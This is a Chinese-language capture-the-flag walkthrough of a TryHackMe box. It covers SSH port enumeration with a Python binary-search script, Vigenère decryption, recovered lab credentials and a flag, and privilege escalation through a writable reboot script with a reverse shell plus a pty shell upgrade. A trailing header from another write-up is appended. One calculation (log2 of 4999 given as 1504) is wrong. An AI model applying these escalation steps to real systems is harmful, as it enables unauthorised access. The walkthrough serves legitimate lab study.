,9762,9763,9764,9766,9770,9767,9765,9771,9773,9772,9780,9777,9781,9779,9778,9790,9789,9801,9802,9791,9799,9804,9811,9803,9800,9806,9805,9808,9814,9815,9809,9807,9810,9813,9816,9817,9812,9818,9821,9819,9820,9824,9828,9822,9826,9823,9829,9825,9827,9830,9831,9832,9833,9837,9834,9836,9839,9841,9835,9838,9848,9840,9842,9846,9847,9844,9851,9849,9845,9850,9843,9853,9852,9865,9857,9855,9859,9862,9854,9856,9863,9861,9866,9860,9858,9868,9864,9867,9870,9869,9872,9871,9878,9874,9875,9879,9873,9877,9876,9880,9884,9886,9882,9881,9888,9889,9883,9887,9885,9893,9892,9891,9890,9896,9900,9904,9898,9895,9899,9894,9901,9910,9907,9906,9905,9897,9908,9903,9902,9913,9909,9912,9911,9915,9926,9914,9924,9917,9923,9920,9919,9925,9922,9921,9918,9916,9930,9928,9927,9929,9934,9941,9937,9939,9931,9933,9936,9935,9940,9938,9932,9942,9943,9944,9961,9972,9966,9962,9971,9964,9967,9969,9963,9968,9970,9965,9975,9973,9974,9978,9979,9977,9980,9976,9981,9996,9983,9982,10000,9984,9986,9985,9997,10001,9998,9999,10002,10003,10006,10005,10004,10007,10011,10017,10015,10012,10008,10009,10013,10014,10010,10016,10018,10020,10019,10021,10022,10024,10023,10027,10025,10028,10026,10034,10032,10030,10029,10035,10031,10033,10037,10036,10039,10038,10042,10041,10044,10040,10045,10043,10046,10047,10049,10048,10050,10052,10051,10056,10053,10054,10055,10057,10058,10060,10059,10064,10065,10067,10062,10070,10071,10066,10061,10063,10069,10073,10072,10068,10074,10075,10078,10077,10076,10079,10080,10083,10081,10084,10082,10086,10087,10085,10088,10090,10092,10089,10091,10095,10093,10098,10094,10096,10097,10099,10101,10100,10102,10103,10105,10104,10106,10107,10110,10111,10112,10108,10114,10109,10113,10116,10115,10117,10119,10118,10120,10121,10122,10124,10123,10126,10128,10125,10132,10129,10135,10127,10131,10130,10133,10134,10138,10137,10139,10141,10140,10142,10136,10143,10149,10145,10150,10146,10153,10148,10151,10147,10144,10152,10154,10155,10156,10162,10158,10161,10160,10159,10157,10174,10172,10179,10173,10178,10180,10181,10182,10185,10183,10184,10188,10187,10186,10189,10190,10191,10193,10192,10195,10194,10196,10198,10199,10197,10202,10200,10201,10205,10207,10203,10204,10212,10211,10208,10206,10210,10209,10214,10213,10215,10217,10216,10223,10218,10221,10219,10220,10222,10224,10226,10225,10229,10227,10231,10228,10230,10239,10240,10238,10242,10241,10243,10244,10245,10246,10248,10249,10247,10251,10250,10255,10252,10261,10253,10254,10256,10257,10262,10259,10260,10263,10258,10265,10264,10266,10267,10268,10269,10270,10271,10272,10275,10273,10278,10274,10279,10292,10277,10276,10293,10294,10295,10297,10299,10296,10298,10301,10300,10345,10344,10347,10346,10343,10348,10350,10352,10349,10351,10353,10354,10355,10374,10378,10379,10377,10375,10376,10381,10383,10380,10382,10436,10384,10438,10437,10440,10439,10441,10442,10446,10447,10449,10445,10444,10450,10452,10453,10448,10455,10456,10454,10463,10462,10460,10464,10465,10461,10459,10477,10466,10476,10475,10478,10480,10479,10484,10487,10486,10485,10488,10491,10489,10493,10490,10492,10494,10496,10495,10497,10499,10502,10500,10498,10503,10501,10506,10504,10507,10508,10505,10513,10511,10510,10514,10518,10509,10512,10515,10516,10521,10517,10522,10523,10520,10526,10519,10524,10530,10528,10525,10527,10529,10531,10533,10532,10536,10540,10534,10535,10538,10539,10541,10542,10537,10544,10545,10546,10548,10543,10547,10551,10550,10552,10549,10557,10554,10556,10559,10558,10560,10561,10553,10555,10563,10562,10564,10565,10567,10569,10566,10568,10570,10571,10576,10573,10577,10575,10572,10578,10574,10579,10581,10580,10582,10584,10583,10585,10590,10593,10588,10586,10595,10587,10589,10592,10591,10600,10603,10596,10594,10601,10597,10598,10599,10604,10605,10602,10607,10606,10608,10611,10610,10609,10615,10613,10612,10614,10616,10618,10617,10620,10619,10621,10624,10625,10622,10623,10626,10630,10632,10628,10634,10627,10631,10635,10629,10633,10636,10637,10638,10639,10640,10644,10646,10642,10649,10643,10641,10645,10647,10648,10650,10651,10653,10652,10654,10655,10657,10656,10658,10661,10660,10659,10662,10664,10663,10666,10665,10668,10667,10670,10669,10671,10672,10673,10674,10675,10676,10678,10677,10679,10680,10681,10683,10684,10682,10685,10687,10686,10688,10689,10690,10691,10692,10693,10694,10698,10699,10696,10697,10695,10700,10701,10703,10704,10705,10702,10706,10707,10708,10709,10712,10710,10711,10714,10713,10715,10717,10718,10716,10719,10720,10721,10722,10723,10724,10726,10725,10727,10728,10729,10733,10736,10734,10731,10730,10737,10732,10735,10738,10739,10740,10741,10742,10746,10747,10744,10743,10745,10749,10748,10751,10750,10752,10754,10753,10755,10756,10757,10758,10762,10760,10759,10761,10763,10768,10764,10765,10766,10771,10770,10767,10769,10772,10773,10774,10775,10776,10777,10780,10779,10778,10785,10788,10786,10784,10782,10787,10783,10781,10792,10789,10790,10791,10793,10794,10795,10796,10797,10798,10799,10801,10800,10803,10802,9733,9757,9761,9758,9734,9760,9715,9759,9717,9720,10804,9716,9731,9719,9732,9755,9712,9708,9769,9718,9756,9768,9713,9730,10805,9714,9729,9710,9711,9709,9706,9702,9705,9703,9707,10806,9701,9704,10807,10809,10812,10808,10810,10813,10811,10815,10814,10816,10817,10823,10820,10819,10821,10822,10818,10827,10826,10825,10824,10828,10834,10831,10829,10833,10836,10832,10830,10837,10835,10838,10842,10841,10840,10843,10839,10857,10844,10858,10855,10861,10860,9776,10856,9774,9775,9782,9798,9788,9784,9783,9786,9795,9787,9785,10863,10862,9796,10864,9792,9794,9797,9793,10865,10866,10878,10888,10883,10880,10887,10882,10879,10889,10885,10881,10884,10886,10891,10890,10893,10894,10892,10895,10903,10901,10902,10904,10896,10905,10919,10918,10920,10921,10922,10923,10925,10926,10924,10930,10927,10929,10928,10931,10932,10933,10934,10935,10937,10936,10938,10939,10940,10941,10942,10943,10944,10945,10948,10947,10946,10949,10950,10952,10951,10955,10954,10953,10956,10959,10958,10957,10961,10960,9956,9951,9959,9957,9945,9955,9954,9948,9953,9947,10962,9960,9958,9949,9952,10967,10965,9946,10970,10968,10966,9950,10964,10963,10969,10971,10972,10973,10975,10976,10980,10974,10982,10977,10978,10979,10981,10983,10985,9991,9995,10984,9993,9992,9994,9989,9990,9987,9988,10986,10988,10987,10990,10991,10989,10994,10993,10992,10997,10996,10998,10995,10999,11001,11000,11005,11002,11006,11004,11010,11009,11003,11008,11011,11007,11012,11013,11016,11017,11014,11015,11019,11020,11018,11021,11022,11023,11024,11031,11025,11030,11027,11028,11026,11029,11033,11035,11034,11032,11036,11037,11038,11040,11042,11039,11041,11043,11044,11046,11045,11047,11048,11049,11050,11051,11053,11054,11052,11055,11057,11056,11059,11058,11060,11062,11063,11061,11065,11066,11069,11064,11067,11068,11070,11071,11073,11074,11075,11072,11079,11076,11077,11078,10169,10177,10163,10164,10166,10170,11080,10171,10176,10175,10165,10167,11081,10168,11083,11082,11084,11085,11086,11087,11088,11089,11090,11091,11095,11093,11094,11092,11097,11100,11096,11101,11102,11098,11099,11105,11103,11104,11106,11114,11109,11110,11108,11113,11111,11116,11107,11115,11117,11122,11112,11118,11120,11121,11119,11123,11124,11125,11127,11126,11128,11129,11130,11131,11134,11133,11132,11137,11136,11135,11138,11139,11140,11142,11141,11143,11144,11148,11146,11149,11145,11147,11150,11154,11153,11151,11152,11155,11158,11159,11163,11157,11162,11156,11160,11161,11164,11172,11167,11171,11168,11174,11170,11166,11169,11179,11165,11175,11173,11177,11178,11176,11182,11181,11183,11180,11184,11185,11187,11186,11188,11189,11190,10236,10237,10233,10232,11192,10235,11196,10234,11199,11191,11193,11195,11217,11198,11215,11194,11197,11200,11216,11201,11229,11226,11225,11228,11227,11234,11240,11235,11230,11236,11241,11244,11243,11239,11242,11245,11246,11248,11256,11255,11249,11247,11257,11260,11258,11261,11272,11273,11259,11275,11274,11286,11288,11289,11287,11290,11292,11291,11309,11298,11295,10386,11297,11293,10385,11308,11294,11296,11310,11307,10387,11314,11316,11312,11313,11311,11320,11318,11315,11319,11317,11322,11321,11324,11332,11323,11333,11337,11335,11334,11340,11336,11339,11338,11341,10418,10431,10419,10428,10420,10412,10417,10409,10433,10432,10422,10407,10414,10404,10421,10410,10430,10423,10435,10411,10415,10434,10408,10426,10427,10424,10403,10429,10413,10425,10416,10398,10396,10389,10405,10399,10388,10402,10406,10397,10400,11342,10395,10393,10401,10391,10392,10394,10390,11351,11347,11343,11346,11350,11352,11348,11356,11355,11354,11349,11353,10483,10482,10473,10481,10451,10474,10468,10472,10443,10471,10470,10458,10469,10467,11357,11359,10457,11358,11360,11362,11361,11366,11368,11365,11363,11364,11367,11370,11371,11372,11369,11376,11375,11374,11377,11373,11378,11380,11381,11379,11382,11383,11384,11390,11398,11387,11385,11392,11389,11391,11395,11393,11388,11397,11386,11394,11396,11399,11409,11404,11400,11401,11402,11407,11405,11413,11412,11411,11403,11406,11410,11416,11414,11408,11415,11417,11420,11419,11418,11421,11422,11423,11424,11425,11426,11427,11430,11428,11432,11429,11433,11431,11436,11435,11434,11437,11438,11441,11442,11440,11439,11445,11443,11452,11444,11448,11453,11449,11454,11446,11447,11450,11455,11451,11457,11456,11458,11459,11460,11461,11462,11464,11463,11465,11466,11470,11469,11467,11468,11471,11472,11473,11474,11475,11476,11477,11478,11479,11480,11481,11482,11483,11484,11486,11485,11487,11488,11489,11490,11493,11491,11494,11492,11496,11497,11495,11500,11501,11502,11498,11499,11503,11504,11505,11506,11507,11509,11510,11512,11508,11514,11511,11513,11515,11517,11516,11519,11518,11520,11521,11524,11523,11522,11527,11525,11526,11529,11528,11530,11531,11532,11535,11533,11534,11536,11538,11537,11539,11540,11541,11542,11543,11546,11545,11544,11550,11549,11548,11547,11552,11551,11553,11556,11554,11557,11555,11558,11559,11564,11562,11560,11563,11561,11565,11566,11567,11568,11569,11570,11572,11576,11575,11608,11609,11610,11611,11795,11612,11796,11800,11798,11803,11799,11802,11797,11801,11812,11804,11808,11811,11807,11809,11820,11815,11817,11810,11805,11824,11816,11806,11823,11821,11814,11819,11813,11827,11826,11818,11822,11825,11829,11828,11831,11833,11830,11832,10847,10846,10845,10848,11834,11839,11836,11835,11840,11838,11837,11841,11843,11842,11844,10877,10872,10873,10871,10876,10875,10869,10868,10867,10874,10870,11845,10859,11846,10854,10853,10851,10850,10849,11848,11849,10852,11852,11847,11850,11855,11851,11853,11854,11856,11860,11859,11858,11863,11857,11864,11861,11865,11862,11866,11867,11868,10917,10916,10900,10915,10910,10914,10908,10906,10909,10907,10899,10913,10911,10912,10898,10897,11870,11869,11871,11872,11873,11876,11875,11878,11877,11874,11879,11881,11880,11883,11882,11884,11886,11885,11888,11887,11890,11889,11891,11892,11893,11895,11894,11896,11897,11900,11898,11899,11901,11902,11904,11903,11905,11906,11908,11910,11909,11911,11907,11912,11913,11914,11916,11915,11917,11918,11919,11920,11921,11924,11922,11923,11927,11925,11926,11929,11928,11931,11932,11930,11933,11934,11935,11936,11937,11938,11939,11940,11941,11942,11945,11946,11943,11944,11947,11948,11949,11950,11951,11953,11952,11956,11954,11957,11958,11955,11961,11960,11959,11962,11963,11964,11965,11966,11968,11967,11971,11969,11970,11972,11974,11973,11975,11977,11976,11978,11979,11980,11982,11981,11983,11985,11984,11986,11987,11990,11989,11988,11992,11991,11995,11993,11996,11994,11997,11999,11998,12000,12001,12002,12003,12004,12007,12006,12005,12008,12009,12015,12016,12017,12013,12014,12011,12020,12012,12019,12010,12018,12021,12023,12024,12022,12025,12026,12027,12028,12030,12029,12034,12031,12032,12033,12035,12036,12038,12039,12042,12037,12041,12040,12043,12045,12047,12044,12048,12049,12050,12046,12051,12052,12053,12054,12055,12056,12058,12057,12059,12060,12064,12061,12063,12065,12066,12062,12067,12068,12069,12071,12070,11214,11211,12072,11207,11212,11213,11209,11210,11206,11208,11202,11203,11204,11205,12073,12074,12077,12075,12076,12078,12079,12083,12082,12081,12080,12084,12085,12087,12086,12090,12089,12088,12091,12092,12094,12093,12095,12096,12098,12097,12101,12099,12102,12100,12107,12104,12106,12103,12105,12108,12109,12110,11224,11222,11221,11223,11220,11238,11219,11218,11232,11237,11231,11233,12111,12113,12112,12118,12114,12117,12121,12120,12116,12119,12115,11265,11266,11282,11276,11270,11278,11267,11284,11285,11269,11283,12122,11279,11262,11268,11277,11280,11263,11250,11271,11281,11253,11254,11264,11251,11252,12123,12124,12125,12126,12127,12130,12131,12128,12132,12134,12129,11331,11328,11326,11330,11325,11306,11329,12133,11304,11327,11300,11301,12140,11305,12139,11303,11299,12135,11302,12137,12138,12136,12141,12142,12144,12143,12145,12147,12148,12149,12150,12151,12146,12153,12152,11345,12154,12155,12156,11344,12158,12157,12163,12165,12159,12161,12160,12166,12162,12164,12167,12168,12171,12169,12170,12172,12173,12176,12178,12177,12174,12175,12179,12180,12182,12181,12183,12185,12184,12187,12188,12186,12191,12192,12189,12193,12190,12194,12195,12196,12197,12198,12199,12200,12201,12203,12202,12204,12205,12206,12207,12208,12209,12210,12212,12211,12214,12217,12213,12215,12216,12218,12219,12220,12221,12222,12224,12225,12226,12223,12227,12228,12230,12229,12231,12234,12235,12232,12233,12238,12236,12237,12240,12239,12244,12242,12243,12241,12249,12246,12245,12248,12250,12251,12254,12247,12252,12255,12253,12259,12258,12256,12257,12261,12260,12262,12264,12263,12265,12268,12267,12269,12266,12270,12272,12271,12273,12274,12278,12277,12276,12281,12275,12279,12282,12280,12283,12284,12286,12285,12288,12287,12289,12290,12291,12292,12294,12296,12295,12293,12298,12297,12299,12302,12300,12303,12301,12304,12305,12306,12310,12311,12316,12309,12307,12313,12314,12308,12312,12317,12321,12318,12322,12326,12320,12325,12319,12324,12323,12327,12328,12329,12330,12332,12331,12315,12334,12335,12333,12336,12337,12339,12338,12340,12343,12341,12344,12342,12345,12346,12348,12347,12352,12350,12349,12351,12353,12354,12361,12358,12356,12355,12366,12359,12364,12367,12365,12360,12362,12363,12357,12368,12369,12370,11587,11595,11596,11593,11579,11582,11584,11588,11598,11590,11585,11592,11583,11594,11591,11586,11597,11580,11589,11574,11573,11578,11577,11571,11581,12372,12371,12373,12376,12380,12382,12379,12378,12374,12377,12375,12381,12384,12383,12392,12387,12391,12385,12390,12389,12386,12388,12393,12394,12398,12396,12397,12399,12401,12400,12395,12404,12402,12403,12405,12406,12409,12407,12411,12408,12413,12410,12414,12415,12416,11644,12412,11648,11646,11647,11645,11649,11643,11636,11639,11642,11635,11640,11632,12417,11626,11634,11623,11630,11625,11615,11628,11622,11641,11638,11627,11631,11613,11619,11624,11620,11629,11637,11633,11616,11614,11607,11617,11621,11618,11603,11602,11601,11606,11605,11600,11604,11599,12418,12420,12419,12421,12422,12424,12423,12425,12447,12439,12441,12436,12437,12445,12451,12450,12442,12446,12449,12440,12426,12452,12438,12448,12455,12443,12444,12453,12454,12456,12458,12459,12457,12463,12462,12474,12475,12473,12476,11793,11792,11794,11788,11785,11786,11791,11782,11784,11776,11790,11780,11789,11783,11787,11778,11772,11770,11781,11777,11779,11768,11774,11769,11767,11771,11775,11761,11773,11765,11764,11762,11755,11758,11751,11754,11759,11745,11753,11747,11766,11757,11760,11763,11756,11744,11735,11746,11750,11738,11743,11740,11741,11748,11749,11752,11732,11737,11742,11730,11727,11731,11736,11734,11729,11739,11733,11728,12485,12483,12478,12477,12484,12486,12487,12491,12493,12492,12495,12494,12496,12497,12498,12500,12502,12501,12499,12503,12504,12505,12506,12508,12507,12509,12512,12510,12514,12511,12513,12515,12516,12517,12518,12524,12520,12523,12522,12519,12521,12526,12525,12527,12529,12528,12530,12531,12532,12534,12536,12533,12535,12543,12538,12537,12539,12544,12540,12541,12542,12547,12546,12554,12545,12548,12549,12553,12555,12551,12556,12552,12550,12557,12559,12558,12560,12562,12561,12563,12564,12566,12567,12568,12565,12569,12570,12573,12572,12571,12574,12579,12576,12577,12575,12580,12578,12584,12581,12583,12586,12587,12582,12585,12588,12590,12589,12592,12595,12593,12591,12594,12596,12599,12600,12597,12601,12598,12604,12602,12605,12606,12603,12607,12608,12610,12609,12611,12612,12615,12613,12614,12628,12631,12632,12626,12627,12629,12630,12633,12634,12635,12636,12646,12647,12648,12649,12650,12653,12651,12656,12655,12654,12652,12658,12662,12660,12659,12657,12661,12665,12663,12664,12666,12669,12667,12668,12670,12671,12672,12673,12674,12675,12676,12679,12677,12685,12678,12686,12688,12687,12697,12698,12699,12701,12700,12713,12703,12712,12714,12711,12702,12720,12716,12717,12721,12718,12719,12715,12722,12725,12723,12724,12726,12728,12730,12727,12735,12731,12729,12734,12737,12732,12733,12736,12739,12745,12738,12740,12748,12746,12761,12749,12762,12750,12747,12770,12765,12772,12768,12766,12767,12769,12763,12778,12775,12780,12782,12777,12776,12771,12764,12781,12784,12783,12779,12787,12786,12788,12790,12789,12791,12794,12797,12798,12800,12799,12796,12802,12795,12793,12792,12803,12801,12804,12808,12806,12815,12816,12807,12805,12819,12817,12818,12820,12823,12824,12826,12822,12825,12821,12827,12828,12829,12832,12831,12830,12834,12835,12833,12836,12837,12838,12839,12841,12842,12840,12843,12846,12844,12850,12848,12849,12845,12851,12847,12854,12852,12855,12853,12856,12858,12857,12860,12861,12859,12862,12863,12864,12865,12867,12868,12866,12869,12872,12875,12873,12870,12874,12876,12878,12871,12879,12882,12880,12883,12881,12877,12887,12885,12886,12884,12889,12890,12896,12893,12892,12891,12888,12895,12894,12897,12898,12900,12901,12899,12904,12903,12902,12907,12905,12906,12908,12910,12909,12911,12913,12912,12915,12916,12914,12917,12918,12919,12921,12922,12920,12924,12925,12923,12926,12927,12928,12929,12932,12930,12933,12931,12934,12942,12936,12935,12939,12937,12943,12944,12940,12941,12945,12938,12946,12947,12949,12951,12950,12948,12952,12953,12954,12958,12956,12962,12955,12959,12960,12961,12957,12970,12972,12966,12965,12969,12968,12967,12964,12973,12974,12976,12978,12971,12985,12977,12979,12963,12981,12987,12986,12984,12982,12993,12990,12988,12975,12992,12980,12989,12983,12991,12999,12995,12996,13000,13002,13001,12994,12997,12998,13003,13004,13007,13015,13012,13011,13008,13017,13016,13005,13014,13009,13010,13018,13006,13013,13031,13033,13030,13149,13029,13035,13034,13032,13037,13036,13152,13150,13151,13235,13153,13236,13237,13240,13241,13238,13242,13245,13239,13247,13243,13244,13246,13248,13249,13255,13258,13257,13260,13259,13262,13256,13270,13264,13263,13269,13271,13272,13275,13276,13277,13278,13279,13280,13282,13284,13286,13283,13285,13281,13287,13288,13290,13294,13293,13289,13291,13292,13296,13297,13295,13299,13305,13302,13300,13298,13301,13306,13303,13304,12435,12430,12428,12433,12432,12431,12434,12427,12429,13308,13307,13309,13311,13312,13310,13314,13317,13315,13316,13313,13318,13319,13323,13321,13320,13324,13325,13326,13322,13327,13328,13329,13330,13331,13333,13332,13334,12470,12472,12469,12466,12467,12471,12468,12464,12465,12461,12460,13336,13335,13339,13337,13338,13342,13341,13344,13343,13340,13345,13346,13347,13348,13349,13350,12490,12489,12488,12482,12481,12479,12480,13351,13353,13352,13354,13356,13355,13357,13358,13359,13367,13364,13361,13360,13363,13362,13365,13366,13369,13373,13370,13371,13368,13379,13372,13378,13374,13376,13375,13381,13382,13380,13377,13383,13384,13385,13390,13386,13388,13387,13389,13391,13392,13399,13393,13395,13400,13397,13404,13396,13398,13402,13403,13415,13408,13407,13412,13401,13394,13405,13406,13416,13409,13417,13414,13410,13411,13419,13418,13413,13420,13424,13421,13425,13423,13422,13426,13427,13428,13430,13429,13431,13432,13434,13433,13437,13436,13440,13439,13435,13438,13444,13443,13449,13448,13447,13442,13446,13454,13441,13451,13450,13457,13456,13445,13455,13465,13452,13453,13458,13462,13459,13461,13469,13467,13466,13470,13472,13460,13468,13464,13463,13471,13474,13476,13473,13479,13475,13477,13478,13481,13480,13482,12624,13496,12620,12616,12623,12622,13497,12625,12617,12621,12619,12618,13500,13499,13502,13501,13498,13503,13507,13505,13504,13509,13506,13511,13508,13512,13514,13510,13515,13513,12642,12645,12640,12637,12644,12643,12639,12638,12641,13517,13521,13519,13522,13516,13518,13520,13523,13524,13525,13526,13528,13530,13531,13527,13529,13532,13533,13534,13535,13536,13537,13539,13538,13541,13543,13540,13542,13544,13545,13546,13547,13548,13549,13550,13551,13552,13554,13553,12710,12707,12709,12708,13555,12705,13556,12706,12694,12704,12683,12693,12690,12680,12695,12684,12692,12681,12689,12696,12682,13557,12691,13561,13560,13562,13559,13558,13570,13568,13565,13571,13564,13567,13563,13566,13575,13574,13573,13569,13572,13576,13578,13577,13579,12741,12759,12751,12785,12752,13580,12743,12744,12756,12754,12774,12755,12760,12753,12757,12758,12773,12742,13581,13582,13583,13584,13585,13586,13587,13589,13588,12812,12814,12813,12811,12810,12809,13590,13593,13592,13591,13594,13598,13595,13596,13597,13599,13601,13600,13602,13603,13605,13606,13604,13608,13607,13609,13610,13611,13612,13614,13615,13613,13616,13617,13619,13618,13620,13621,13625,13622,13624,13623,13627,13626,13628,13629,13630,13634,13635,13632,13633,13636,13631,13637,13638,13641,13640,13642,13639,13646,13645,13647,13643,13644,13649,13648,13652,13650,13655,13654,13651,13653,13656,13657,13658,13660,13659,13661,13663,13662,13664,13665,13667,13666,13668,13671,13670,13672,13669,13675,13674,13677,13673,13676,13681,13686,13679,13685,13680,13682,13687,13678,13683,13684,13688,13691,13693,13695,13689,13694,13690,13692,13697,13696,13698,13699,13701,13700,13702,13703,13704,13708,13706,13707,13709,13710,13705,13713,13711,13712,13722,13716,13714,13717,13725,13723,13720,13715,13727,13721,13724,13718,13726,13729,13728,13731,13719,13730,13732,13733,13734,13745,13738,13735,13740,13743,13741,13746,13744,13737,13739,13742,13736,13747,13748,13750,13754,13048,13752,13753,13749,13756,13043,13755,13751,13044,13047,13027,13757,13021,13019,13045,13038,13046,13028,13042,13026,13020,13039,13025,13041,13024,13022,13040,13023,13758,13759,13762,13760,13761,13766,13765,13763,13764,13767,13768,13772,13061,13059,13062,13060,13773,13774,13779,13780,13791,13792,13794,13793,13795,13800,13796,13799,13797,13801,13798,13802,13074,13808,13840,13809,13807,13075,13806,13823,13824,13839,13841,13842,13104,13106,13103,13105,13101,13102,13100,13099,13088,13098,13089,13090,13087,13844,13854,13853,13856,13851,13096,13094,13097,13095,13852,13850,13855,13857,13858,13863,13849,13865,13864,13866,13867,13868,13872,13871,13869,13870,13873,13874,13127,13134,13129,13132,13131,13118,13117,13122,13115,13135,13116,13133,13128,13111,13124,13123,13107,13121,13126,13130,13109,13119,13113,13120,13112,13114,13108,13110,13125,13144,13148,13146,13138,13142,13143,13145,13147,13137,13139,13136,13140,13141,13163,13875,13164,13162,13174,13878,13165,13170,13158,13167,13169,13173,13172,13175,13154,13166,13155,13161,13160,13157,13171,13168,13156,13159,13880,13879,13882,13883,13881,13885,13884,13887,13886,13892,13888,13890,13889,13891,13227,13232,13893,13234,13894,13233,13220,13228,13221,13224,13230,13231,13213,13212,13229,13223,13222,13214,13199,13204,13218,13215,13216,13225,13207,13217,13226,13208,13219,13205,13210,13206,13209,13193,13201,13200,13202,13198,13195,13211,13203,13185,13194,13189,13187,13184,13188,13197,13191,13192,13186,13196,13183,13190,13895,13179,13178,13181,13898,13896,13177,13180,13176,13182,13897,13899,13900,13906,13902,13901,13905,13904,13253,13251,13254,13907,13903,13252,13250,13908,13909,13910,13912,13911,13913,13914,13261,13915,13267,13274,13265,13916,13268,13273,13266,13917,13918,13919,13920,13921,13924,13925,13926,13923,13922,13928,13930,13927,13931,13932,13933,13929,13934,13935,13936,13938,13939,13941,13937,13942,13943,13940,13944,13945,13946,13947,13948,13951,13949,13950,13952,13953,13954,13955,13956,13957,13958,13959,13962,13960,13961,13963,13966,13968,13964,13965,13967,13972,13969,13971,13973,13979,13970,13977,13975,13981,13974,13978,13982,13980,13983,13984,13987,13986,13988,13976,13985,13989,13990,13993,13991,13992,13994,13997,13998,13995,13996,13999,13487,13489,13490,13486,13484,13488,13491,13485,13483,13494,13495,13492,13493,13778,13775,13770,13769,13777,13787,13789,13771,13783,13788,13784,13776,13790,13781,13782,13786,13785,13834,13833,13837,13825,13838,13835,13822,13836,13832,13820,13817,13829,13827,13828,13814,13803,13830,13831,13821,13826,13815,13819,13805,13818,13811,13804,13816,13813,13810,13812,13862,13861,13848,13860,13859,13847,13845,13843,13846,13877,13876 10.10.150.136
發現 nmap 結果都一樣- 9100 ~ 9107 好像不太一樣
但實際連上去看起來還是一樣的直接用 ssh 連線-
他跟我說了一個 Lower
輸入比較大的數字又跟我說 Higher我們可以計算一下 port 的最小跟最大值-
13999 - 9000 = 4999如果透過二分搜尋法的話， Worst case 是- log2(13999 - 9000) = 1504發現他的 High Low 是反的

import subprocess
ip = "10.10.150.136"

ports = open("ports.txt").read().split("\n")
ports = [int(i) for i in ports]
ports.sort()

# port = ports[-1]
l = ports[0]
r = ports[-1]
while True:
 port = int((l+r)/2)
 print(f"L={l} , R={r}")
 process = subprocess.Popen(['ssh', '-o' , 'StrictHostKeyChecking=no' , str(ip) , '-p' , str(port)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
 out, err = process.communicate()
 print(port , out)
 if out == b'Lower\r\n':
 # r = port
 l = port
 elif out == b'Higher\r\n':
 # l = port
 r = port
 else:
 print("!!!!!")
 break

爆出結果是 9934上面出現一堆的亂碼-

You've found the real service.
Solve the challenge to get access to the box
Jabberwocky
'Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql.

'Fvphve ewl Jbfugzlvgb, ff woy!
Ioe kepu bwhx sbai, tst jlbal vppa grmjl!
Bplhrf xag Rjinlu imro, pud tlnp
Bwl jintmofh Iaohxtachxta!'

Oi tzdr hjw oqzehp jpvvd tc oaoh:
Eqvv amdx ale xpuxpqx hwt oi jhbkhe--
Hv rfwmgl wl fp moi Tfbaun xkgm,
Puh jmvsd lloimi bp bwvyxaa.

Eno pz io yyhqho xyhbkhe wl sushf,
Bwl Nruiirhdjk, xmmj mnlw fy mpaxt,
Jani pjqumpzgn xhcdbgi xag bjskvr dsoo,
Pud cykdttk ej ba gaxt!

Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh
Ewl vpvict qseux dine huidoxt-achgb!
Al peqi pt eitf, ick azmo mtd wlae
Lx ymca krebqpsxug cevm.

'Ick lrla xhzj zlbmg vpt Qesulvwzrr?
Cpqx vw bf eifz, qy mthmjwa dwn!
V jitinofh kaz! Gtntdvl! Ttspaj!'
Wl ciskvttk me apw jzn.

'Awbw utqasmx, tuh tst zljxaa bdcij
Wph gjgl aoh zkuqsi zg ale hpie;
Bpe oqbzc nxyi tst iosszqdtz,
Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd

看起來是 jabberwocky 的詩，透過某種方法進行編碼/加密https://www.poetryfoundation.org/poems/42916/jabberwocky分析密文-
推測可能是 Chaocipher 或 Vigenere Cipher透過網站爆破- https://www.boxentriq.com/code-breaking/vigenere-cipher
炸出了結果twas brillig and the slithy toves did gyre and gimble in the wabe all mimsy were the borogoves and the mome raths outgrabe beware the jabberwock my son the jaws that bite the claws that catch beware the jubjub bird and shun the frumious bandersnatch he took his vorpal sword in hand long time the manxome foe he sought so rested he by the tumtum tree and stood awhile in thought and as in uffish thought he stood the jabberwock with eyes of flame came whiffling through the tulgey wood and burbled a
key 為 thealphabetcipher透過廚師正式解碼-

'Twas brillig, and the slithy toves
Did gyre and gimble in the wabe;
All mimsy were the borogoves,
And the mome raths outgrabe.

'Beware the Jabberwock, my son!
The jaws that bite, the claws that catch!
Beware the Jubjub bird, and shun
The frumious Bandersnatch!'

He took his vorpal sword in hand:
Long time the manxome foe he sought--
So rested he by the Tumtum tree,
And stood awhile in thought.

And as in uffish thought he stood,
The Jabberwock, with eyes of flame,
Came whiffling through the tulgey wood,
And burbled as it came!

One, two! One, two! And through and through
The vorpal blade went snicker-snack!
He left it dead, and with its head
He went galumphing back.

'And hast thou slain the Jabberwock?
Come to my arms, my beamish boy!
O frabjous day! Callooh! Callay!'
He chortled in his joy.

'Twas brillig, and the slithy toves
Did gyre and gimble in the wabe;
All mimsy were the borogoves,
And the mome raths outgrabe.
Your secret is bewareTheJabberwock

看到了 secret 為 bewareTheJabberwock輸入後
取得了一組帳號密碼jabberwock:ThankedDrownedSpeakWishing

SSH

可以正常連上取得 User Flag-
}32a911966cab2d643f5d57d9e0173d56{mht
看起來是字串反轉
thm{65d3710e9d75d5f346d2bac669119a23}

提權

起手式 sudo -l準備豌豆-
sudo 版本怪怪ㄉ- 檔案系統可能怪怪ㄉ發現重新開機會用 jabberwock 使用者執行腳本- 而這個腳本我們可寫- 寫一個 reverse shell 然後重開機
重新開機後順利收到 shell-

二次提權

python3 -c 'import pty; pty.spawn("/bin/bash")'觀察家目錄的檔案-

dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9
7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431ed
28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624
b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404f
fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6
b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0
5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b

看起來是一堆的 hash

Bounty Hacker (Try Hack Me Writeup)

Thu, 19 Aug 2021 23:57:00 +0800

URL : https://tryhackme.com/room/cowboyhacker

IP : 10.10.164.54

